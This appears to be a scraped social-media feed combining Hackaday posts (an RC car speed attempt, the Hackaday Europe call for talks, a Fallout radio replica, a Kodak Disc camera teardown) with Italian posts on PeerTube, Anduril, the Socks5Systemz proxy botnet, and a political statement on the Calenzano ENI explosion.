With the quadcopter record of nearly 500 km/h which we covered previously, the challenge was in a way easier, as other than air resistance and accidental lithobraking there are no worries about ground texture, tire wear or boundary layer aerodynamics. In comparison, the RC car has to contend with all of these, with the runway’s rough tarmac surface being just one of the issues, along with making sure that the wheels would hold up to the required rotation speed. For the wheels you got options like foam, hard rubber, etc., all with their own advantages and disadvantages, mostly in terms of grip and reliability.
So far speeds of over 200 km/h are easy enough to do, with foam wheels being the preferred option. To push the RC car to 300 km/h and beyond, a lot more experimentation and trial runs will have to be performed. Pending are changes to the aerodynamic design with features also commonly seen in F1 race cars such as downforce spoilers, diffusers and other tricks which should prevent the RC car from (briefly) becoming an RC airplane.
youtube.com/embed/8sLmrpDYoLs?…
like this
𝔻𝕚𝕖𝕘𝕠 🦝🧑🏻💻🍕 reshared this.
2025 Hackaday Europe CFP: We Want You!
Hackaday’s Supercon is still warm in our hearts, and the snow is just now starting to fall, but we’re already looking forward to Spring. Or at least to Hackaday Europe, which will be taking place March 15th and 16th in Berlin, Germany.
Tickets aren’t on sale yet, but we know a way that you can get in for free.
Call for Participation
What makes Hackaday Europe special? Well, it’s you! We’re excited to announce that we’re opening up our call for talks right now, and we can’t wait to hear what you have to say. Speakers of course get in free, but the real reason that you want to present is whom you’re presenting to.
The Hackaday audience is interested, inquisitive, and friendly. If you have a tale of hardware, firmware, or software derring-do that would only really go over with a Hackaday crowd, this is your chance. We have slots open for shorter 20-minute talks as well as longer 40-minute ones, so whether you’ve got a quick hack or you want to take a deep dive, we’ve got you covered. We especially love to hear from new voices, so if you’ve never given a talk about your projects before, we’d really encourage you to apply!
Hackaday Europe, the Badge, and the SAOs
If you’re not familiar with Hackaday Europe, it’s a gathering of 350 folks for a ridiculously fun weekend of talks, badge hacking, music, and everything else that goes with it. Saturday the 15th is the big day, and Sunday is a half-day of brunch, lightning talks, and showing off the badge hacks from the day before. And if you’re in town on Friday the 14th, we’ll be going out in the evening for drinks and dinner, location TBA.
We’ll be re-spinning the 2024 Supercon SAO badge, which was all about the Supercon Add-Ons. (Can anyone think up a Hackaday-Europe-themed backronym: “Spree Add Ons”?) The badge was an inspiration for many stateside Supercon attendees to dip their toes into the warm waters of small badgelet designs, and we’re hoping to bring the same to the Continent. Additionally, there are two prototyping “petals” that you can hack on during the event, even if you didn’t make anything beforehand. And of course, there’s always hacking the firmware.
But wait, there’s more! We also ran a contest for pre-Supercon SAO designs, and the top three designs will be in your schwag bags at Hackaday Europe. Yes, this means that every attendee will be receiving a functional plug-in multimeter, etch-a-sketch, and blinky wavy-arm-art-thing. These are among the most creative and fun SAOs that we’ve ever seen, and now you too can have one!
See you There!
Again, tickets aren’t on sale yet, but we’re opening the green-room door to those who want to present first. Take the next few weeks to firm up an outline and get your talk proposal in to us before January 14th. We can’t wait to see what you’re up to!
L'app ufficiale di PeerTube è ora disponibile:
All'app mancano molte funzionalità, ma non è colpa degli sviluppatori
framablog.org/2024/12/10/peert…
Il post di @Fedi.Tips 🎄
⬇️
like this
reshared this
Anduril raddoppia sull’underwater. Dopo Ghost Shark, ecco Dive Xl
@Notizie dall'Italia e dal mondo
L’attenzione da parte dei governi verso le capacità unmanned destinate ad operare nel dominio dell’underwater è in costante crescita. E alcune aziende l’hanno capito. Una di queste è Anduril Industries, che ha recentemente avviato test di resistenza per il suo nuovo sottomarino autonomo
Pornhub's Year in Review report for 2024 reveals a search for something very mindful, and very demure.
Pornhubx27;s Year in Review report for 2024 reveals a search for something very mindful, and very demure.#pornhub #AIPorn
Pornhub Sees Surge of Interest in Tradewife Content, ‘Modesty,’ and Mindfulness
Pornhub's Year in Review report for 2024 reveals a search for something very mindful, and very demure.Samantha Cole (404 Media)
Alex Bracco likes this.
Creating A Radiation King Radio In The Real World
If you’re a fan of the Fallout series of games, you’ve probably come across a Radiation King radio before. In the game, that is, they don’t exist in real life. Which is precisely why [zapwizard] built one!
Externally, the design faithfully recreates the mid-century design of the Radiation King. It’s got the louvered venting on the front panel, the chunky knobs, and a lovely analog needle dial, too. Inside, it’s got a Raspberry Pi Zero which is charged with running the show and dealing with audio playback. It’s paired with a Pi Pico, which handles other interface tasks.
It might seem simple, but the details are what really make this thing shine. It doesn’t just play music, it runs a series of simulated radio stations which you can “tune into” using the radio dial. [zapwizard dives into how it all works—from the air core motor behind the simulated tuning dial, to the mixing of music and simulated static. It’s really worth digging into if you like building retro-styled equipment that feels more like the real thing.
It’s not just a prop—it’s a fully-functional item from the Fallout universe, made manifest. You know how much we love those. If you’re cooking up your own post-apocalyptic hacks, fictional or non-fictional, don’t hesitate to let us know.
NCC e Foglio di servizio elettronico: dal punto di vista della protezione dei dati personali.
@Privacy Pride
Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/ncc-fdse…
I rastrellamenti e le deportazioni accadute durante la vigenza delle leggi razziali erano perfettamente legali perchè previste dalla legge. Aiutare e nascondere Anne Frank per salvarla dalla camera a gas è stato un
Disc Film,When Kodak Pushed Convenience Too Far
Having a penchant for cheap second-hand cameras can lead to all manner of interesting equipment. You never know what the next second-hand store will provide, and thus everything from good quality rangefinders an SLRs to handheld snapshot cameras can be yours for what is often a very acceptable price. Most old cameras can use modern film in some way, wither directly or through some manner of adapter, but there is one format that has no modern equivalent and for which refilling a cartridge might be difficult. I’m talking about Kodak’s Disc, the super-compact and convenient snapshot cameras which were their Next Big Thing in the early 1980s. In finding out its history and ultimate fate, I’m surprised to find that it introduced some photographic technologies we all still use today.
Easy Photography For The 1980s
Since their inception, Kodak specialised in easy-to-use consumer cameras and films. While almost all the film formats you can think of were created by the company, their quest was always for a super-convenient product which didn’t require any fiddling about to take photographs. By the 1960s this had given us all-in-one cartridge films and cameras such as the Instamatic series, but their enclosed rolls of conventional film made them bulkier than required. The new camera and film system for the 1980s would replace roll film entirely, replacing it with a disc of film that would be rotated between shots to line up the lens on an new unexposed part of its surface. Thus the film cartridge would be compact and thinner than any other, and the cameras could be smaller, thinner, and lighter too. The Disc format was launched in 1982, and the glossy TV adverts extolled both the svelteness of the cameras and the advanced technology they contained.The Disc cartridge, with Fuji “HR” planar crystal film.
The film disc is about 65mm in diameter, with sixteen 10x8mm exposures spaced at every 24 degrees of rotation round its edge. It has a much thicker acetate backing than the more flexible roll film, with a set of sprocket-hole-like cutouts round its edge and a moulded plastic centre boss. The cassette is quite complex, having a protective low friction layer and a vacuum-formed lightproof film window cover and disc advancer inside the two injection moulded halves. Meanwhile the image size is significantly smaller than that of the 16mm 110 cartridge film or a 35mm frame, meaning that Disc films were the first to be released with Kodak’s new higher-resolution tabular grain emulsion. This film had the silver halide crystals aligned flat on the substrate, reducing light scattering.
Turning to the camera, for teardown purposes here we have a battered old Kodak 4000. This was the slightly fancier of the disc cameras at launch, but now they can easily be found for pennies in thrift stores. Opening it up is a case of gently easing the aluminum front panel away from the body, revealing all the internals. Once inside the camera, everything is automatic. On the left is the xenon flash tube, the flash capacitor, and a pair of Matsushita lithium batteries, in the middle the circuit board covered by a high voltage warning sticker, and on the right are the mechanical parts. If you teardown one of these for yourself, you’ll want to disconnect the battery as we did, and discharge that flash capacitor. Even four-decade-old lithium batteries can hold enough capacity to charge it, and at 200 volts it packs a punch.
A Lot Of Complexity For A Simple Product
This thing is a lot more complex than the 126 cameras it replaced.
Carefully unsoldering the connections and lifting the board from the camera, we find a mixture of through-hole and surface-mount parts. The flash circuit is conventional, a small single transistor inverter that’s responsible for the “Wheeee” sound you hear when cameras of that era are turned on. The rest of the circuit is interesting, because all the control and light metering circuitry is driven by an integrated circuit. Marked “ACP 152”, it has no makers mark other than stating it was manufactured in Malaysia, and all manner of online searches on the part number reveal nothing. If this camera had been made in 2002 it would certainly be a microcontroller, but in 1982 such a conclusion would be much less likely and would certainly have been central to their marketing if present. Looking at its support components I see no clock circuit or other likely microcontroller ancillaries, so my best guess is it’s an ASIC containing analogue and logic circuitry, forming part of a simple state machine along with the electromechanical cam arrangement in the mechanism.
On the right a small motor turns a wheel (the blue plastic part in the photographs) with that selection of cams that open the window in the film cartridge and cock the shutter, for which the release is electronic via a small electromagnet. One of the functions is to push up a pin which lifts part of the film window cover clear of its locking protrusion, allowing the film to be advanced and the window opened. The lens doesn’t look special but in fact it’s the part which has most relevance to some of the cameras you’ll use today, because it’s the first mass-produced aspherical plastic lens. To deliver as sharp an image as possible on the smaller negative they needed a lens which would minimise aberations, and given the compact size of the camera they couldn’t have a multi-element lens that poked out of the front. This was the solution, and it’s a technology that has had a massive effect on miniature cameras ever since.
Where They Pushed Convenience Too Far
Looking for the first time at the workings of a Disc camera then, it’s a beautiful piece of miniaturisation, but it’s undeniably a complex mechanism when compared to the Instamatic 126 cameras it replaced or the 35mm compact cameras which competed with it. The specialist electronics, the electronic shutter release, and all those mechanical parts are impressive, but there’s a lot in there for a consumer snapshot camera. In doing this teardown we start for the first time to gain an inkling of why the disc format never achieved the success Kodak evidently hoped for it, though it’s when we consider a typical Disc photo that the real reason for its failure emerges.The size of the negative is especially obvious when looking at a developed film. D. Meyer, CC BY-SA 3.0.
The Disc’s tiny negative, when combined with the high-resolution film, gave a good quality image. But in those days when photographic prints were the medium through which people consumed their pictures, it was a this smaller negative which led to lower quality enlargements. To solve this problem Kodak sold a complete printing package to laboratories with an enlarger system specifically for Disc film, but many laboratories chose to use their existing equipment instead. The result was that the new cameras often generated disappointing-quality prints. By comparison a 35mm snapshot camera gave a much higher quality and had 36 pictures on a roll of film, so for all its sophistication and innovation the Disc format was not a success. By the 1990s the cameras were gone, and the film followed some time around the millennium. Kodak would try one last shot at ultimate film convenience in the mid 1990s with the Advanced Photo System, but by then the digital camera revolution was well under way.
Looking at the Disc camera here in 2024, it’s clearly a well designed item both mechanically and aesthetically. I have three of them on my bench, they still look sleek, and amazingly those four-decade-old lithium batteries still have enough power to run them. With hindsight it’s easy to say that its shortcomings should have been obvious, but I remember at the time they were seen as futuristic and the way forward. I didn’t buy one though, perhaps it says it all that they were way outside pocket-money prices. Maybe the real insight comes in using Disc to explain why Kodak are now a shadow of their former self; when the reason for extreme convenience in film photography was eclipsed by digital cameras they had nothing else to offer.
Socks5Systemz : 250.000 dispositivi nella botnet che fornisce proxy anonimi ai criminali
Negli ultimi anni, le botnet hanno rappresentato una delle minacce più insidiose e difficili da contrastare nel panorama della cybersicurezza. Tra queste, una delle più persistenti e sofisticate è senza dubbio Socks5Systemz, una botnet attiva sin dal 2013. Questa rete malevola alimenta un servizio proxy illegale noto come PROXY.AM, utilizzando dispositivi compromessi per fornire a criminali informatici una rete anonima con cui occultare le loro attività illecite.
Indagini attraverso la threat Intelligence permettono di comprendere meglio l’ampiezza di questa minaccia e i meccanismi alla base del suo funzionamento. Vediamo come questa botnet è strutturata, quali sono le sue implicazioni sulla sicurezza globale e perché rappresenta un rischio concreto e costante.
Cos’è una Botnet e Come Funziona Socks5Systemz
Una botnet è una rete di dispositivi infettati da malware e controllati da remoto da un attaccante, noto come botmaster. I dispositivi compromessi, spesso chiamati bot o zombie, possono includere computer, smartphone, router e persino dispositivi IoT. L’attaccante utilizza questa rete per svolgere attività malevole come inviare spam, lanciare attacchi DDoS o, come nel caso di Socks5Systemz, fornire servizi di proxy anonimi.
La botnet Socks5Systemz ha una caratteristica distintiva: trasforma i dispositivi infetti in nodi di uscita proxy. Ciò significa che il traffico internet dei cybercriminali può essere instradato attraverso questi dispositivi, rendendo estremamente difficile risalire alla vera origine degli attacchi. Questo tipo di infrastruttura è fondamentale per garantire l’anonimato degli attaccanti e rendere le loro attività quasi impossibili da tracciare.
Il Servizio Proxy Illegale PROXY.AM
La botnet Socks5Systemz supporta il funzionamento di un servizio proxy illegale noto come PROXY.AM. Secondo il rapporto di The Hacker News, questo servizio offre ai cybercriminali l’accesso a proxy privati e anonimi dietro pagamento di una quota mensile che varia tra 126 e 700 dollari. PROXY.AM pubblicizza i suoi servizi come:
- “Elite” proxy server, garantendo elevate prestazioni e anonimato.
- “Privati” e “anonimi”, assicurando che le connessioni siano sicure e non tracciabili.
I clienti di PROXY.AM possono utilizzare questi proxy per nascondere le proprie attività malevole, come campagne di phishing, furti di dati, frodi online e diffusione di malware.
Declino e Rinascita della Botnet
Dal 2013, la botnet ha subito diverse trasformazioni. Inizialmente, contava circa 250.000 dispositivi compromessi. Tuttavia, grazie alle azioni delle autorità e alla perdita parziale di controllo da parte dei suoi gestori, la rete si è ridotta. Attualmente, si stima che la botnet sia composta da circa 85.000 dispositivi infetti, che continuano a essere utilizzati come nodi di uscita per il servizio PROXY.AM. Questo declino è stato seguito da una fase di ricostruzione, dimostrando la resilienza e la capacità di adattamento dei botmaster.
Analisi della Struttura della Botnet
L’immagine allegata fornisce una chiara rappresentazione visiva delle interconnessioni tra i vari elementi della botnet. Vediamo alcuni punti salienti:
Nodo Centrale: Socks5Systemz
- Socks5Systemz è il fulcro della rete, il nodo principale da cui si diramano numerose connessioni.
- Questo nodo controlla e gestisce il traffico che viene instradato attraverso i dispositivi infetti.
Servizi Collegati
- PROXY.AM e proxyam.one sono servizi direttamente collegati a Socks5Systemz. Essi rappresentano l’infrastruttura utilizzata per vendere accessi proxy ai criminali informatici.
- Questi servizi sono indicati come fonti di traffico malevolo, offrendo connessioni anonime e private per attività illegali.
Paesi Colpiti
Dalla mappa della rete, è evidente che la botnet colpisce dispositivi in diverse parti del mondo. I paesi più colpiti includono:
- India
- Indonesia
- Ucraina
- Brasile
- Bangladesh
- Federazione Russa
- Messico
- Stati Uniti
- Nigeria
Questi paesi fungono da base per i dispositivi compromessi che vengono utilizzati come nodi proxy, permettendo al traffico malevolo di apparire come proveniente da queste aree.
Implicazioni per la Sicurezza Informatica
L’esistenza di una botnet come Socks5Systemz evidenzia diverse criticità e implicazioni per la sicurezza globale:
- Difficoltà nel Tracciamento degli Attaccanti:
Poiché gli attaccanti utilizzano dispositivi compromessi come nodi di uscita proxy, risalire alla loro identità diventa estremamente difficile. Questo complica le indagini e favorisce l’impunità dei cybercriminali. - Frode e Criminalità Organizzata:
Servizi come PROXY.AM facilitano attività criminali su larga scala, inclusi attacchi di phishing, frodi finanziarie e campagne di spam. Il costo relativamente basso per l’accesso a questi servizi rende la criminalità informatica accessibile anche a individui con risorse limitate. - Rischi per le Vittime Inconsapevoli:
I dispositivi compromessi spesso appartengono a utenti ignari. Questi dispositivi possono essere utilizzati per scopi malevoli senza che i proprietari se ne accorgano, esponendoli a potenziali conseguenze legali e compromettendo la loro privacy. - Minacce per le Aziende:
Le aziende possono subire attacchi originati da queste reti proxy, mettendo a rischio dati sensibili, reputazione e stabilità operativa.
Come Proteggersi dalle Botnet
Per contrastare minacce come Socks5Systemz, è fondamentale adottare buone pratiche di sicurezza informatica:
- Mantenere sempre aggiornati i sistemi operativi e il software per ridurre le vulnerabilità sfruttabili dai malware.
- Utilizzare antivirus e soluzioni di sicurezza avanzate per rilevare e bloccare attività sospette.
- Monitorare il traffico di rete per individuare comportamenti anomali, come connessioni non autorizzate a server esterni.
- Eseguire backup regolari dei dati per mitigare i danni in caso di compromissione.
- Educare gli utenti sui rischi delle email di phishing e dei download non sicuri.
La botnet Socks5Systemz e il servizio proxy illegale PROXY.AM rappresentano una minaccia persistente e sofisticata per la sicurezza informatica globale. La capacità di questa rete di adattarsi e sopravvivere nel tempo dimostra quanto sia difficile contrastare efficacemente queste infrastrutture malevole. La collaborazione internazionale e l’adozione di misure preventive sono essenziali per mitigare l’impatto di queste minacce e proteggere utenti e aziende dagli attacchi dei cybercriminali.
L'articolo Socks5Systemz : 250.000 dispositivi nella botnet che fornisce proxy anonimi ai criminali proviene da il blog della sicurezza informatica.
Posso oggi confermare quanto ho scritto ieri nel mio precedente comunicato.
Gli autotrasportatori sono stati ammazzati da un sistema che scarica su di loro le operazioni di carico ad alto rischio.
In un impianto ENI inserito nella Direttiva Seveso a effettuare le operazioni di carico delle autobotti non sono lavoratori specializzati con contratto dei chimici ma i camionisti. Per questo sono morti loro.
A Calenzano, come ovunque in Italia, anche negli impianti Eni, si è risparmiato sui costi del personale per il carico facendo fare direttamente ai camionisti un lavoro per il quale non hanno quasi sempre una formazione specifica né tanto meno opportuna copertura assicurativa. Questo sistema, che coinvolge anche una grande società come Eni, crea una situazione di altissimo rischio considerato che così si gestiscono quasi ovunque in Italia materiali infiammabili e tossici
Si tratta di una cosa che in Germania, in Francia e gran parte d’Europa non accade: in altri paesi l’autotrasportatore consegna il mezzo agli operatori e ci risale sopra dopo che il personale ha concluso le operazioni. Per assicurarsi i contratti le ditte di trasporti accettano di farsi carico di queste operazioni e così fanno anche i padroncini che, essendo cottimisti e subordinati, sono di fatto l’anello debole della catena dei subappalti, costretti a lavorare perennemente nella fretta.
È molto grave che ENI non abbia ancora fornito informazioni al riguardo. Le autorità competenti dovrebbero appurare immediatamente se queste sono le circostanze della strage. Non accetto che si parli di errore umano perché, se quanto mi riferiscono camionisti è vero, degli onesti lavoratori sono morti a causa di un sistema che fa profitti sulla loro pelle. Siamo di fronte a omicidi bianchi di cui portano la responsabilità non solo l’ENI e tutte le autorità che avrebbero dovuto garantire la sicurezza. Ci rendiamo conto che questo sistema operava in un sito ad altissima pericolosità e che l’esplosione estendendosi a tutto l’impianto avrebbe potuto provocare un disastro ancor più devastante? Credo che l’autorità giudiziaria dovrebbe verificare se quanto ho appreso corrisponda al vero e inviterei le procure a estendere i controlli a tutta Italia. Non è tollerabile che in impianti che rientrano nella direttiva Seveso, o comunque ad alta pericolosità, si consentano operazioni di carico senza personale specializzato. Mi dicono che in qualche caso il personale ci sarebbe ma si tratterebbe non di lavoratori inquadrati nel contratto dei chimici ma di cooperative sociali.
La situazione che denuncio dicono che sia normale ma non lo è se Oltralpe accade il contrario. Il fatto che in questa condizione si trovano quotidianamente gli autotrasportatori italiani rende l’idea di quale sia il rispetto per le condizioni di sicurezza di chi lavora nel nostro paese. Approfittando di una normativa non chiara per quanto riguarda le competenze di caricatori e trasportatori le imprese si sono scaricate i costi relativi alla gestione di questa situazione di rischio.
Ai familiari delle vittime e dei dispersi la solidarietà del Partito della Rifondazione Comunista.
Maurizio Acerbo, segretario nazionale del Partito della Rifondazione Comunista
Acerbo (Prc): a Calenzano responsabilità ENI, trasportatori vittime di un sistema
Posso oggi confermare quanto ho scritto ieri nel mio precedente comunicato. Gli autotrasportatori sono stati ammazzati da un sistema che scarica su di loro lRifondazione Comunista
rag. Gustavino Bevilacqua reshared this.